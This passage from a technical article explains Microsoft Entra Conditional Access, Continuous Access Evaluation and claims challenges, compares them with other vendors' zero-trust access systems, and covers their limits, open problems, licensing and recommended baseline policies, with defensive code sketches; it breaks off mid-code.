WWW-Authenticate: Bearer authorization_uri="<entra-authorize-endpoint>", error="insufficient_claims", claims="<base64-encoded JSON>"

The claims value is a base64-encoded JSON object that the client passes verbatim to the token endpoint when acquiring a fresh token [@ms-claims-challenge][@ms-app-resilience-cae]. The IdP evaluates the embedded claims, runs CA again with the new context, and issues a new token (or refuses).
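A minimal sketch of the client-side parsing step, assuming a Node.js runtime (it uses `Buffer`). The header value and the claims payload are invented for illustration, and `parseClaimsChallenge` is a hypothetical helper; production clients should rely on their auth library's challenge parser rather than a regular expression.

```javascript
// Parse a WWW-Authenticate value and return the decoded claims challenge,
// or null if the header is not an insufficient_claims challenge.
function parseClaimsChallenge(headerValue) {
  if (!/^Bearer\s/i.test(headerValue)) return null;
  const params = {};
  const pairPattern = /(\w+)="([^"]*)"/g;
  let match;
  while ((match = pairPattern.exec(headerValue)) !== null) {
    params[match[1]] = match[2];
  }
  if (params.error !== 'insufficient_claims' || !params.claims) return null;
  const json = Buffer.from(params.claims, 'base64').toString('utf8');
  return { authorizationUri: params.authorization_uri, claims: JSON.parse(json) };
}

// Illustrative payload and header, encoded here so the sample stays consistent.
const sampleClaims = '{"access_token":{"nbf":{"essential":true,"value":"1604106651"}}}';
const sampleHeader =
  'Bearer authorization_uri="https://login.microsoftonline.com/common/oauth2/authorize", ' +
  'error="insufficient_claims", ' +
  'claims="' + Buffer.from(sampleClaims, 'utf8').toString('base64') + '"';

console.log(parseClaimsChallenge(sampleHeader));
```

Note that the sketch decodes the blob only to inspect it; what goes back to the token endpoint is the claims content the resource supplied, unchanged.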

**Claims challenge** is the HTTP wire format CAE uses to revoke a session mid-flight. A CAE-aware resource API returns `HTTP 401` with `WWW-Authenticate: Bearer error="insufficient_claims", claims="<base64-encoded JSON>"`. The client replays the base64 blob to Entra; Entra re-runs CA with the new context; the client receives a fresh token or a definitive refusal. The wire format is documented at [@ms-claims-challenge] and demonstrated at [@ms-app-resilience-cae].

Note: The CAE-aware capability is signalled by the client, not by the token. The client advertises cp1 via xms_cc; the token's CAE-awareness shows up as its lifetime (up to 28 hours) and the resource API's willingness to issue a claims challenge. Folk knowledge that says "look for a cae claim in the JWT" is incorrect.

The Microsoft Learn CAE document enumerates five critical events: account disabled or deleted, password change or reset, MFA enabled by an administrator, administrator token revocation, and high user risk detected by ID Protection [@ms-cae-concept]. A parallel pathway, Conditional Access policy evaluation, propagates network-location and policy changes to CAE-aware resource providers on the same channel. For IP-location changes the latency is "instant"; for everything else the ceiling is up to 15 minutes [@ms-cae-concept].
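Those ceilings turn into a simple worst-case calculation. The sketch below compares the window in which a stale token still works with and without CAE. The event identifiers are hypothetical labels for the events listed above, and the numbers are the documented upper bounds, not measured latencies.

```javascript
// Hypothetical labels for the five critical events listed in the text.
const CRITICAL_EVENTS = [
  'accountDisabledOrDeleted',
  'passwordChangeOrReset',
  'mfaEnabledByAdmin',
  'adminTokenRevocation',
  'highUserRisk',
];

// Upper bound, in minutes, between an event and its enforcement under CAE.
function enforcementCeilingMinutes(event) {
  if (event === 'ipLocationChange') return 0; // documented as "instant"
  if (CRITICAL_EVENTS.includes(event)) return 15; // "up to 15 minutes"
  throw new Error('not a CAE-propagated event in this sketch: ' + event);
}

// Worst-case exposure: the CAE ceiling for CAE-aware sessions, otherwise the
// remaining lifetime of the access token.
function exposureMinutes(event, { caeAware, tokenLifetimeMinutes }) {
  return caeAware ? enforcementCeilingMinutes(event) : tokenLifetimeMinutes;
}

console.log(exposureMinutes('accountDisabledOrDeleted', { caeAware: false, tokenLifetimeMinutes: 60 }));
console.log(exposureMinutes('accountDisabledOrDeleted', { caeAware: true, tokenLifetimeMinutes: 28 * 60 }));
```

The second call is the point of the design: the token is 28 times longer-lived, yet the worst-case exposure drops from 60 minutes to 15.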

sequenceDiagram
    participant C as Client app
    participant R as Resource API CAE aware
    participant E as Entra token issuer
    participant P as ID Protection
    Note over C: Client holds long-lived CAE token
    C->>R: GET messages with bearer token
    R->>R: Token still cryptographically valid
    P->>E: High user risk event for Alice
    E->>R: Push critical event Alice high risk
    C->>R: GET messages with bearer token again
    R->>C: 401 WWW-Authenticate insufficient_claims claims base64
    C->>E: Token request with claims blob and cp1 capability
    E->>E: Re-run CA with new context
    E-->>C: New token or definitive refusal
    C->>R: Retry with new token

{`
// Simplified MSAL.js-shaped pseudocode for CAE opt-in and challenge handling
import { PublicClientApplication } from '@azure/msal-browser';

const ENTRA_AUTHORITY = '';
const EXCHANGE_ENDPOINT = '';
const MAIL_READ_SCOPE = '';

const msal = new PublicClientApplication({
  auth: {
    clientId: '',
    authority: ENTRA_AUTHORITY,
    // MSAL.js takes client capabilities in the app configuration,
    // not on each token request.
    clientCapabilities: ['cp1'], // advertise CAE awareness
  },
});

async function callExchange() {
  // A real call also passes the signed-in account; omitted here for brevity.
  let token = await msal.acquireTokenSilent({ scopes: [MAIL_READ_SCOPE] });

  let res = await fetch(EXCHANGE_ENDPOINT, {
    headers: { Authorization: 'Bearer ' + token.accessToken },
  });

  if (res.status === 401) {
    const header = res.headers.get('WWW-Authenticate') || '';
    const m = /claims="([^"]+)"/.exec(header);
    if (m) {
      // Replay the embedded claims (base64-decoded) to acquire a fresh token.
      // atob is used instead of Buffer because Buffer does not exist in browsers.
      token = await msal.acquireTokenSilent({
        scopes: [MAIL_READ_SCOPE],
        claims: atob(m[1]),
      });
      res = await fetch(EXCHANGE_ENDPOINT, {
        headers: { Authorization: 'Bearer ' + token.accessToken },
      });
    }
  }

  console.log('HTTP', res.status);
}

callExchange();
`}

Key idea: CAE inverts the conventional trade-off: lengthen the token, shorten the revocation. The token can live 28 hours because revocation is an event, not a clock.

The chain is now visible. The signal plane scored Alice's Tuesday sign-in. The policy plane evaluated the policies. The token issuer issued an access token (CAE-aware because Outlook advertises cp1). Exchange Online accepted the token and returned mail. If, twelve minutes from now, Alice's account is flagged high risk because a different sign-in attempt fires leakedCredentials, the critical event will fire, Exchange will issue a claims challenge, and Outlook will either acquire a fresh token (passing the new CA evaluation) or surface the refusal to the user.

Six independent components co-decided on one access event. Microsoft is one vendor. The same problem has been solved differently by Google, Okta, AWS, Cloudflare, and Zscaler. The Microsoft answer is not the only correct answer.

7. How others do it

Microsoft chose to enforce at token issuance and claims challenge. Google chose to enforce at every HTTP request via a reverse proxy. AWS chose a decidable policy DSL. These are not minor variations; they are different answers to "where does the policy engine live in the data path?"

Both Microsoft's and Google's models scale. Neither is strictly better. The choice is a function of what the enterprise already runs.

Google BeyondCorp, IAP, Chrome Enterprise Premium

Google's Identity-Aware Proxy puts the policy engine in the data path. The documentation calls it bluntly: "IAP lets you establish a central authorization layer for applications accessed by HTTPS, so you can use an application-level access control model instead of relying on network-level firewalls" [@google-iap]. Every HTTP request to an IAP-protected app passes through the proxy. The proxy authenticates the user (via Google Account, Workforce Identity Federation, or Identity Platform), evaluates a Common Expression Language policy against the request context, and -- on allow -- forwards the request to the backend with signed identity headers.

The BeyondCorp Enterprise product (recently rebranded as Chrome Enterprise Premium) layers context-aware access on top: device posture, geographic location, time of day [@google-bce-overview]. The architecture matches the 2014 USENIX paper [@ward-beyer-2014-beyondcorp] and the 2016 production follow-up [@osborn-2016-beyondcorp].

The strength is per-request authorization: every HTTP call is its own decision point. The weakness, from the M365 perspective, is that IAP does not gate Microsoft 365 first-party API traffic. The Outlook client does not route through Google's IAP; it routes through Entra and Exchange Online. For Microsoft 365 workloads, IAP is complementary at best.

Okta Identity Engine and ThreatInsight

Okta's policy engine is closer to Microsoft's structurally: the identity provider is the policy engine, app sign-on policies live on the IdP, and the resource side relies on the IdP's token rather than a per-request proxy. The Okta Identity Engine documents the rule shape: "App sign-in policies define how a user must authenticate to gain access to an app. They verify ... group membership, the IP zone they're signing in from, risk level, and others" [@okta-sign-on-policies]. Every new app gets a default policy with a single catch-all rule that allows access with two factors.

Okta ThreatInsight is the IP-reputation feed. The documentation describes it operationally: "Okta ThreatInsight aggregates data about sign-in activity across the Okta customer base to analyze and detect potentially malicious IP addresses ... password spraying, credential stuffing, brute-force cryptographic attacks" [@okta-threatinsight]. The signal coverage is narrower than ID Protection: ThreatInsight is IP-centric, where ID Protection runs a multi-detection ML pipeline on tokens, sessions, behaviour, and credentials.

AWS IAM Identity Center and Verified Access

AWS splits the problem. IAM Identity Center handles workforce SSO and trusted identity propagation to AWS services [@aws-iam-identity-center]. AWS Verified Access handles per-request authorization for HTTPS-fronted apps -- the ZTNA piece. The Verified Access docs put it plainly: "Verified Access evaluates each application access request in real time" and "verifies the trustworthiness of users and devices against a set of security requirements" [@aws-verified-access].

The interesting bit is the policy language: Cedar. Cedar is a deliberately decidable language for authorization policy. "Decidable" here is a precise term: the safety question (will some policy edit, in some future edit chain, leak this right?) is answerable by a static analyser for any Cedar policy [@cedar-security].

Cedar's intentional non-Turing-completeness is the language-design hedge against the Harrison-Ruzzo-Ullman undecidability result the next section will name. The trade-off is expressiveness: Cedar cannot express arbitrary computational predicates, which is the price of being analysable [@cedar-security].

Cloudflare Access and Zscaler Private Access

Cloudflare Access is an edge proxy. Policies are deny-by-default, with four building blocks: Actions (Allow, Block, Bypass, Service Auth), Rule types (Include, Require, Exclude), Selectors, and Values [@cloudflare-access-policies]. The deny-by-default semantics are explicit: "Since Access is deny by default, users who do not match a Block policy will still be denied access unless they explicitly match an Allow policy" [@cloudflare-access-policies]. Cloudflare also ships a policy tester that lets administrators dry-run a policy against the existing user population [@cloudflare-access-policy-mgmt].
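The deny-by-default rule is easier to see in code. The sketch below is a simplified model, not Cloudflare's implementation. It assumes Include rules combine as OR, Require as AND, and Exclude as NOT, evaluates policies in listed order, and ignores Bypass and Service Auth. The `Policy` class, `decide` function, and selector strings are hypothetical.

```python
from dataclasses import dataclass, field


@dataclass
class Policy:
    action: str                                 # "allow" or "block" in this sketch
    include: set = field(default_factory=set)   # request must match at least one
    require: set = field(default_factory=set)   # request must match all of these
    exclude: set = field(default_factory=set)   # request must match none of these

    def matches(self, attrs: set) -> bool:
        return (
            bool(self.include & attrs)
            and self.require <= attrs
            and not (self.exclude & attrs)
        )


def decide(policies: list, attrs: set) -> str:
    """Return the action of the first matching policy, else deny."""
    for policy in policies:
        if policy.matches(attrs):
            return policy.action
    return "deny"  # deny by default: nothing matched, so nothing is allowed


policies = [
    Policy("block", include={"country:XX"}),
    Policy("allow", include={"group:engineering"}, require={"mfa"},
           exclude={"contractor"}),
]

print(decide(policies, {"group:engineering", "mfa"}))  # matches the allow policy
print(decide(policies, {"group:sales", "mfa"}))        # matches nothing
```

The second request never hits the Block policy and is still refused, which is the behaviour the quoted sentence describes.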

Zscaler Private Access is a broker-based ZTNA: the user connects to a Zscaler edge node, the broker establishes a connection to the private app, and "users never access the corporate network, and apps are never exposed to the public internet" [@zscaler-zpa]. Zscaler's own marketing surveys put the VPN-replacement framing in numbers: "91% of organizations are concerned that VPNs compromise their security" and "56% of organizations suffered one or more VPN-related attacks in 2023-2024" [@zscaler-zpa].

Architecturally, Cloudflare Access and ZPA both sit closer to BeyondCorp than to Microsoft CA: the policy engine is in the data path; the protected resource is fronted by the proxy rather than gated at token issuance.

OpenID Shared Signals Framework and CAEP

Not a competitor: the cross-vendor wire format for what Microsoft built into CAE. On 2 September 2025, the OpenID Foundation approved three Final Specifications: the Shared Signals Framework 1.0, the Continuous Access Evaluation Profile 1.0, and the Risk Incident Sharing and Coordination Profile 1.0 [@helpnet-2025-openid][@openid-caep-final]. CAEP defines five event types -- Session Revoked, Token Claims Change, Credential Change, Assurance Level Change, Device Compliance Change -- as the cross-vendor revocation vocabulary.

Microsoft's CAE implementation is, in Microsoft's own words, "an industry standard based on Open ID Continuous Access Evaluation Profile" [@ms-cae-concept]. The Final Specifications from September 2025 are the canonical post-2025 reference; older drafts at OpenID's site are superseded.
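To make the revocation vocabulary concrete, here is a minimal receiver sketch. It assumes the Security Event Token has already been signature-verified and decoded to a dict. The claim layout (`sub_id` at the top level, events keyed by type URI) is my reading of the Final Specifications and should be checked against them. The `handle_set` function, the session store, and the example issuer and audience are hypothetical.

```python
import time

CAEP = "https://schemas.openid.net/secevent/caep/event-type/"
SESSION_REVOKED = CAEP + "session-revoked"
CREDENTIAL_CHANGE = CAEP + "credential-change"


def handle_set(claims: dict, sessions: dict) -> list:
    """Apply a decoded, already-verified SET payload to a local session store."""
    actions = []
    subject = claims.get("sub_id", {}).get("email")
    for event_type in claims.get("events", {}):
        if event_type == SESSION_REVOKED and subject in sessions:
            del sessions[subject]  # drop every local session for the subject
            actions.append(f"revoked sessions for {subject}")
        elif event_type == CREDENTIAL_CHANGE:
            actions.append(f"flagged {subject} for reauthentication")
        # Unknown event types are ignored rather than treated as errors.
    return actions


example = {
    "iss": "https://idp.example.com/",        # hypothetical transmitter
    "jti": "24c63fb56e5a2d77a6b512616ca9fa24",
    "iat": int(time.time()),
    "aud": "https://receiver.example.com/",   # hypothetical receiver
    "sub_id": {"format": "email", "email": "alice@example.com"},
    "events": {SESSION_REVOKED: {"event_timestamp": int(time.time())}},
}

sessions = {"alice@example.com": ["session-1", "session-2"]}
print(handle_set(example, sessions))
print(sessions)
```

The receiving side is where cross-vendor revocation succeeds or fails: the transmitter can only announce the event, and the receiver has to act on it.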

Head-to-head comparison

The differences worth memorising:

| System | Enforcement point | Native risk feed | Post-issuance revocation | Gates M365 first-party? | Best suited for |
| --- | --- | --- | --- | --- | --- |
| Microsoft Entra CA + ID Protection + CAE | Token issuer + CAE-aware resource APIs | ID Protection ML pipeline | CAE up to 15 min, instant for IP | Yes | M365 tenants |
| Google IAP / Chrome Enterprise Premium | HTTPS reverse proxy | Context-aware access signals | Per-request (always re-decides) | No | Google Cloud workloads |
| Okta Identity Engine + ThreatInsight | IdP token issuance | ThreatInsight IP feed | Limited, IdP-dependent | No | Vendor-neutral front door |
| AWS IAM Identity Center + Verified Access | Verified Access proxy + IAM | Trust providers (third-party) | Per-request for Verified Access | No | AWS-hosted apps |
| Cloudflare Access | Edge proxy | Risk score + identity factors | Per-request | No | Public web apps |
| Zscaler Private Access | Broker / edge node | Posture + identity | Per-request | No | Private app access |

Per-cell sourcing for the table: the Microsoft row's "Yes" cell on M365 first-party gating is the directly-stated claim from the Microsoft Learn CA overview [@ms-ca-overview]. The other rows' "No" cells are negative inferences drawn from each peer's own product documentation, none of which advertises Microsoft 365 first-party API gating: Google IAP gates HTTPS-fronted apps behind the proxy [@google-iap]; Cloudflare Access deny-by-default applies to the apps fronted by Cloudflare [@cloudflare-access-policies]; Verified Access "evaluates each application access request" for HTTPS apps behind AWS [@aws-verified-access]; Zscaler ZPA brokers private app access [@zscaler-zpa]; Okta sign-on policies gate apps wired into Okta's IdP [@okta-sign-on-policies]. The cell semantics are "does the system gate Outlook/Teams/SharePoint/Graph first-party traffic" and the answer is structurally No outside Microsoft.

Figure: two enforcement models. Token issuance model (Microsoft, Okta): User -> Acquire token -> CA evaluator -> Issue token -> Resource API validates token, with a CAE 401 sending the client back to Acquire token. Data path proxy model (Google BeyondCorp, AWS Verified Access, Cloudflare, Zscaler): User -> Proxy intercepts every request -> Policy evaluator at the proxy -> Backend application.

The honest observation worth sitting with: none of the proxy systems gates M365 first-party API traffic. Outlook, Teams, SharePoint, and Microsoft Graph route through Entra. For those workloads, Entra remains the only effective policy plane. The proxy systems gate the apps that sit behind the proxy -- internal apps, partner-facing apps, custom workloads. That makes BeyondCorp, Okta, Cloudflare Access, and ZPA complementary to Entra CA in an M365 environment, not substitutes for it.

Six systems, six architectural choices. None of them wrong. But what do they all leave on the table?

8. What Conditional Access fundamentally cannot do

Section 7 cannot be the ending. There are at least five things Conditional Access -- and every peer in Section 7 -- cannot do. Some are engineering limits; some are theorems. Both classes are worth naming.

(a) On-prem authentication

CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra. There is no policy hook for the legacy Windows protocols. If a domain user signs in to a domain-joined workstation, authenticates to a file server, and accesses a share, no piece of that flow touches Conditional Access. The Microsoft Learn overview is explicit about the scope [@ms-ca-overview].

This is the operational seam between cloud identity and on-prem identity.

Note: Conditional Access does not gate Kerberos or NTLM against on-prem domain controllers. If your threat model includes lateral movement after credential theft on the on-prem side, CA is not your defence. Layer in Defender for Identity, on-prem MFA gateways, or a privileged-access workstation architecture instead.

(b) Post-issuance token theft

Once a refresh token is exfiltrated -- whether via an adversary-in-the-middle phishing kit like Evilginx [@ms-aitm-phishing-blog], an infostealer that scrapes the token cache, or a malicious browser extension -- the pre-issuance CA evaluation is bypassed. The attacker has a bearer token. They can present it to the resource API directly. CAE-aware resource providers can revoke mid-session on the published critical-event list, but the latency ceiling is "up to 15 minutes" for non-IP events [@ms-cae-concept]. In fifteen minutes a competent attacker has done plenty.

The mitigation is device-bound credentials: Primary Refresh Tokens bound to TPM hardware, FIDO2 with hardware attestation, certificate-based authentication with hardware-protected keys [@ms-prt-concept]. A token bound to a TPM-held key is no longer a pure bearer token. It cannot be replayed from another machine in the same way, because the wrapped key material never leaves the device.
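A toy model shows why binding changes the attacker's position. This is an illustration of proof-of-possession in general, not of how Primary Refresh Tokens work: real systems use asymmetric keys held in hardware, while this sketch uses an HMAC key so it runs on the standard library alone. All names here are hypothetical.

```python
import hashlib
import hmac
import secrets


def sign(device_key: bytes, token: str, nonce: bytes) -> bytes:
    """Prove possession of the device key for this token and this challenge."""
    return hmac.new(device_key, token.encode() + nonce, hashlib.sha256).digest()


def server_accepts(bound_key: bytes, token: str, nonce: bytes, proof: bytes) -> bool:
    """Accept the token only if the proof was made with the key it is bound to."""
    return hmac.compare_digest(sign(bound_key, token, nonce), proof)


device_key = secrets.token_bytes(32)   # stands in for a key that never leaves the TPM
token = "opaque-token-value"           # what an infostealer could copy
nonce = secrets.token_bytes(16)        # fresh challenge from the server

# The legitimate device can answer the challenge.
legit = server_accepts(device_key, token, nonce, sign(device_key, token, nonce))

# An attacker holds the copied token but must sign with some other key.
attacker_key = secrets.token_bytes(32)
stolen = server_accepts(device_key, token, nonce, sign(attacker_key, token, nonce))

print(legit, stolen)
```

With a plain bearer token there is no second check, so the copied string alone is enough.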

(c) Consent-grant phishing

CA evaluates authentication, not authorization grants that a user makes to a malicious OAuth app. A user who clicks "Allow" on a permissions-consent prompt for an attacker-controlled app has performed an OAuth authorization, not a sign-in. The malicious app now has the user's delegated permissions for whatever scopes were granted. CA was not invoked because CA gates the user's sign-ins; it does not inspect the user's OAuth grants. Microsoft Defender for Cloud Apps documents the attack class as "risky OAuth apps" and ships investigation and remediation tooling on a separate plane from CA [@ms-illicit-consent-grant].

Admin consent settings, app governance policies, and explicit allow-listing of acceptable publishers live on that different plane. The policy admin who deploys CA needs to deploy app governance separately.

(d) Risk evaluation is probabilistic

Identity Protection produces a score, not a proof. A "high" risk level is a confidence; it is not the assertion "this sign-in is definitely an attack." No vendor in the Section 7 survey publishes precision or recall numbers for its risk engine. The operating point -- the threshold that maps a continuous score to discrete buckets -- is a trade-off that the vendor calibrates and the customer does not see.

This is a structural lower bound on any ML-driven risk plane, not a Microsoft-specific failure. Any classifier has false positives and false negatives. A risk-aware CA policy that says "block at high risk" will, with non-zero probability, block a legitimate sign-in. A policy that says "require MFA at medium risk" will, with non-zero probability, let through a sophisticated attacker whose detections fall under the threshold.
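The arithmetic behind that claim is plain Bayes' rule. The numbers below are invented for illustration, since no vendor publishes its real operating point. They assume one hostile sign-in in 10,000, a detector that catches 90% of them, and a 0.1% false-positive rate.

```python
def alert_precision(base_rate: float, tpr: float, fpr: float) -> float:
    """Return P(attack | flagged) for a detector at one operating point."""
    flagged_attacks = base_rate * tpr
    flagged_benign = (1.0 - base_rate) * fpr
    return flagged_attacks / (flagged_attacks + flagged_benign)


# Hypothetical operating point, not a published vendor figure.
precision = alert_precision(base_rate=1e-4, tpr=0.90, fpr=1e-3)
missed = 1e-4 * (1.0 - 0.90)  # share of all sign-ins that are unflagged attacks

print(f"{precision:.1%} of flagged sign-ins are real attacks")
print(f"{missed:.4%} of all sign-ins are attacks that slip under the threshold")
```

Under these assumptions roughly one flagged sign-in in twelve is hostile. A "block at high risk" policy therefore blocks mostly legitimate users, and the 10% of attacks below the threshold still pass.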

(e) Workload-identity CA is constrained by design

Block-only grants. No managed identities. No group assignments. The full human grant taxonomy does not transfer because a service principal cannot perform an MFA challenge, cannot register a FIDO2 key, cannot accept a terms-of-use document. The Microsoft Learn page on workload-identity CA enumerates the constraints precisely [@ms-workload-identity-ca]. Section 9 will name this as an open problem; for now, treat it as a documented limit.

The theorems behind the limits

Some of these limits are engineering choices that could be different in a future product. Some are deeper.

Saltzer and Schroeder 1975 [@saltzer-schroeder-1975] give the upper bound on aspirations: complete mediation across every authentication and authorization decision within scope of mediation. The principle does not constrain what is in scope. It constrains what you must do for whatever you have decided is in scope. On-prem AD is out of scope for CA by Microsoft's product decision; complete mediation cannot fix that, because the principle is about consistency within the boundary, not about expanding the boundary.

Harrison-Ruzzo-Ullman 1976 -- usually shortened to HRU [@harrison-ruzzo-ullman-1976] -- gives the lower bound on static analysis. The safety question in the general access-matrix model is undecidable. In informal terms: there is no general algorithm that proves a Conditional Access policy edit cannot, under some future edit chain, leak a sensitive right. This is why every vendor in the survey relies on evaluation-time mediation (the engine decides at the moment of the request) rather than static-proof analysis (the engine certifies in advance that no edit can ever leak). Cedar's intentional restriction to a decidable fragment, in AWS Verified Access, is the counter-strategy: trade expressiveness for analysability.

The bearer-token revocation trade-off is informal but real: the worst-case revocation latency is bounded below by the token's natural lifetime, unless a side channel exists. CAE is that side channel. Its latency is bounded by the propagation time of the channel (up to 15 minutes for non-IP events, instant for IP). Shorten the channel further and you discover that the IdP-to-resource-API event delivery has its own infrastructure costs.
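The bound can be written as a single `min`. The sketch below uses the article's own figures: a one-hour token with no side channel, and a 28-hour CAE token with a 15-minute propagation ceiling. The function name is hypothetical.

```python
from datetime import timedelta


def worst_case_exposure(remaining_lifetime, channel_latency=None):
    """Upper bound on how long a revoked user's token keeps working."""
    if channel_latency is None:
        return remaining_lifetime  # no side channel: wait for natural expiry
    return min(remaining_lifetime, channel_latency)


legacy = worst_case_exposure(timedelta(hours=1))
cae = worst_case_exposure(timedelta(hours=28), timedelta(minutes=15))

print("1-hour token, no CAE:", legacy)
print("28-hour token, CAE  :", cae)
```

The longer-lived token has the shorter exposure window because the channel, not the lifetime, sets the bound.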

The practical implication of HRU for a CA admin is that there is no tool, anywhere, that can examine your tenant's CA policies and certify that no sequence of policy edits could ever leak access to a sensitive resource. Vendors offer policy *testers* that simulate a single edit against the current population; that is decidable. The question "is the system safe under all possible future edits?" is not. This is why audit trails, change-control gates, and least-privilege role assignments on the CA admin role matter as much as the CA policies themselves.

Naming the limits clears the way to name the active unsolved problems -- the ones the field is still working on, where the current state of the art admits it is partial.

9. Where the policy plane is still incomplete

Microsoft's own 2026 documentation for Conditional Access on AI agents calls the current implementation "a lightweight enforcement mechanism designed to block unauthorized or risky agents, not a full policy suite." That is not marketing modesty. It is an admission that the most active frontier of policy enforcement -- agent identities -- is deliberately under-specified.

Five open problems sit on that frontier in 2026.

Organizations are expanding Zero Trust across more users, applications, and now a growing population of AI agent identities ... the Conditional Access Optimization Agent moves beyond static guidance to continuous, context-aware identity posture optimization. [@ms-techcom-ca-optimization-agent]

9.1 Agent identity policy semantics

What grants should exist for AI agents beyond block and allow? Useful candidate grants include: "read-but-not-move" for mail or files; "business-hours-only"; "any autonomous action requires a fresh sign-off from the on-behalf-of human." None of these exist as first-class CA grant types in 2026.

What does exist: CA targeting of agent identities -- the ability to match a policy on the agent identity rather than the human -- and the Conditional Access Optimization Agent, which gives administrators continuous recommendations on policy posture [@ms-techcom-ca-optimization-agent]. The targeting is there. The grant taxonomy is still mostly the human one, applied imperfectly.

9.2 Cross-vendor CAEP interop

The wire format was finalised in September 2025 [@helpnet-2025-openid][@openid-caep-final]. Production receiver coverage outside Microsoft Entra-internal resource providers is partial. Two large vendors agreeing on an event schema is necessary but not sufficient for cross-vendor revocation to work in practice; the receiving side needs to act on the events. The next eighteen months are the period in which CAEP either becomes the cross-vendor wire format for revocation, or it does not.

9.3 Workload-identity grant set

What richer expressions could exist for non-human identities? The current Microsoft Learn page lists workload-identity detections: investigationsThreatIntelligence, suspiciousSignins, adminConfirmedServicePrincipalCompromised, leakedCredentials, maliciousApplication, suspiciousApplication, anomalousServicePrincipalActivity, suspiciousAPITraffic [@ms-workload-identity-risk]. The detections exist; the grant taxonomy stops at block.

Candidate richer grants: "workload attestation" (the service principal proves it is running on attested infrastructure), "verifiable claim from a trusted attester" (a third party signs a statement about the workload), "step-up authorization for sensitive scopes" (a higher-privilege scope requires a separate per-request authorization step). None of these is generally available in 2026.

Workload identity: A non-human identity in Entra ID: a service principal, an application registration's owned service principal, or a managed identity in Azure. Workload identities authenticate via client secrets, client certificates, federated credentials, or (for managed identities) instance-metadata-service tokens. Conditional Access for workload identities currently applies only to single-tenant service principals registered in the tenant; it does not cover multi-tenant SaaS apps or managed identities [@ms-workload-identity-ca].

9.4 The break-glass paradox

Emergency-access accounts must be excluded from CA. If a CA misconfiguration locks out every admin, the break-glass account is the recovery path. But exclusion creates a high-value bypass: an attacker who compromises a break-glass account inherits its exclusion.

There is no clean answer. Microsoft's guidance is exclusion plus FIDO2 binding plus alerting: the break-glass accounts have hardware-bound FIDO2 keys (so they cannot be phished), they are excluded from all CA policies (so misconfiguration cannot lock them out), and every sign-in is alerted on (so misuse is detected within minutes) [@ms-emergency-access].

Run two break-glass accounts, not one. Store the FIDO2 keys in separate physical safes under separate custodians. Use them only for a genuine lockout or for the recovery exercise you run once per quarter; if they sign in at any other time, treat the alert as a P1 incident. The operational pattern accepts that you have a bypass and treats the bypass as the highest-value alert in the tenant [@ms-emergency-access].

9.5 The risk-engine transparency problem

No vendor in the Section 7 survey publishes model architecture, feature vector size, or per-detection precision and recall. Microsoft does not. Okta does not. Google does not. Defenders, auditors, and regulators must accept a black-box score.

This matters in three places. First, for incident response: when an "atypical travel" detection fires for an executive, the responder cannot see which features contributed and how strongly. Second, for compliance: an auditor asked to evidence the effectiveness of the control plane gets the operating output (3-tier risk levels) but not a quantitative evaluation. Third, for the risk-engine vendors themselves, who must respond to legitimate regulatory questions about model bias and operational reliability without revealing the architecture that attackers would use to evade detection.

The article does not predict a resolution. It names the gap.

The architecture is incomplete by admission. It is also actionable today. A competent tenant administrator can deploy a sensible baseline in an afternoon.

10. Using Conditional Access today

The architectural story ends; the operational story begins. Here is what a competent tenant looks like in 2026.

The licensing reality

Conditional Access is not a feature every Microsoft 365 tenant gets. It is a feature gated by SKU. The licensing tiers are:

Entra ID Free. Security Defaults only [@ms-security-defaults]. No Conditional Access policies. No risk-based conditions. No CA-driven CAE (the critical-event-evaluation subsystem -- for events like account disable, password reset, and high user risk -- still propagates to CAE-aware M365 services at the service layer regardless of SKU; see Section 6.6) [@ms-cae-concept].
Entra ID P1. Conditional Access is unlocked [@ms-ca-overview]. You can author policies with any of the non-risk conditions: users, apps, locations, devices, client app, platform. You can demand any of the non-risk grants.
Entra ID P2. Adds risk-based conditions. signInRiskLevels and userRiskLevels become usable [@ms-id-protection-overview]. ID Protection's full report pane (risky users, risky sign-ins, risk detections) is accessible. The legacy ID-Protection-side risk policies retire 1 October 2026 [@ms-id-protection-policies].
Workload Identities Premium. A separate SKU. Unlocks CA scoped to service principals [@ms-workload-identity-ca].

This corrects a premise discarded earlier: "Conditional Access is the policy plane every M365 tenant runs on" is not true. Many tenants run on Security Defaults. The "policy plane every tenant runs on" is the cloud sign-in pipeline; CA is the configurable richer layer that P1+ tenants opt into.

Start with the managed baselines

Microsoft-managed Conditional Access policies are the recommended starting point [@ms-managed-policies]. They auto-deploy in Report-only mode, run for at least 45 days while administrators review the impact in the Sign-in logs, and are auto-enabled with a 28-day pre-enablement notification unless administrators opt out [@ms-managed-policies]. The currently shipping baselines, per Microsoft Learn, include:

MFA for admins accessing Microsoft admin portals (the most-privileged roles).
MFA for users who already have per-user MFA enabled (a migration aid).
MFA and reauthentication for risky sign-ins (the P2 baseline).
Block legacy authentication.
Block access for high-risk users (P2-tier protection on the user-risk surface).
Block all high-risk agents accessing all resources (Preview, AI-agent surface).

The original announcement called for a 90-day report-only window [@weinert-2023-managed-policies][@helpnet-2023-microsoft-entra-policies]. The current default is 45 days [@ms-managed-policies]; the window shrank as Microsoft gained confidence that customers were not surprised by the auto-enablement.

Five custom policies on top of the baselines

Beyond the managed policies, well-run tenants typically layer five custom policies on top of the baselines [@ms-ca-policy-common]: block legacy authentication unconditionally [@ms-managed-policies]; require the phishing-resistant Authentication Strength for any user in a privileged role [@ms-auth-strengths]; require compliantDevice for admin centres, finance apps, and customer-data exports [@ms-intune-compliance-partners]; restrict privileged sign-ins to a named-location allow-list with block-or-step-up outside it [@ms-ca-network]; and, where Entra ID P2 is licensed, demand a sign-in-risk-based step-up (MFA at medium risk, a passwordless or phishing-resistant method at high risk) [@ms-id-protection-policies].

Note: 1. Block legacy authentication. 2. Phishing-resistant Authentication Strength for admin roles. 3. Require compliant device for sensitive applications. 4. Named-location restrictions for privileged roles. 5. Sign-in-risk-based step-up where Entra ID P2 is available.
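As a sketch of the first item, the function below builds a Graph policy body that blocks legacy authentication while excluding the break-glass accounts. The `clientAppTypes` values and the `block` control are standard `conditionalAccessPolicy` fields. The object IDs are placeholders you would replace, and the function name is hypothetical.

```python
import json

# Hypothetical placeholders: substitute the object IDs of your emergency-access accounts.
BREAK_GLASS_IDS = ["<object-id-of-break-glass-1>", "<object-id-of-break-glass-2>"]


def block_legacy_auth_policy(exclude_users):
    """Build a report-only policy body that blocks legacy authentication clients."""
    return {
        "displayName": "Block legacy authentication",
        "state": "enabledForReportingButNotEnforced",
        "conditions": {
            "users": {"includeUsers": ["All"], "excludeUsers": list(exclude_users)},
            "applications": {"includeApplications": ["All"]},
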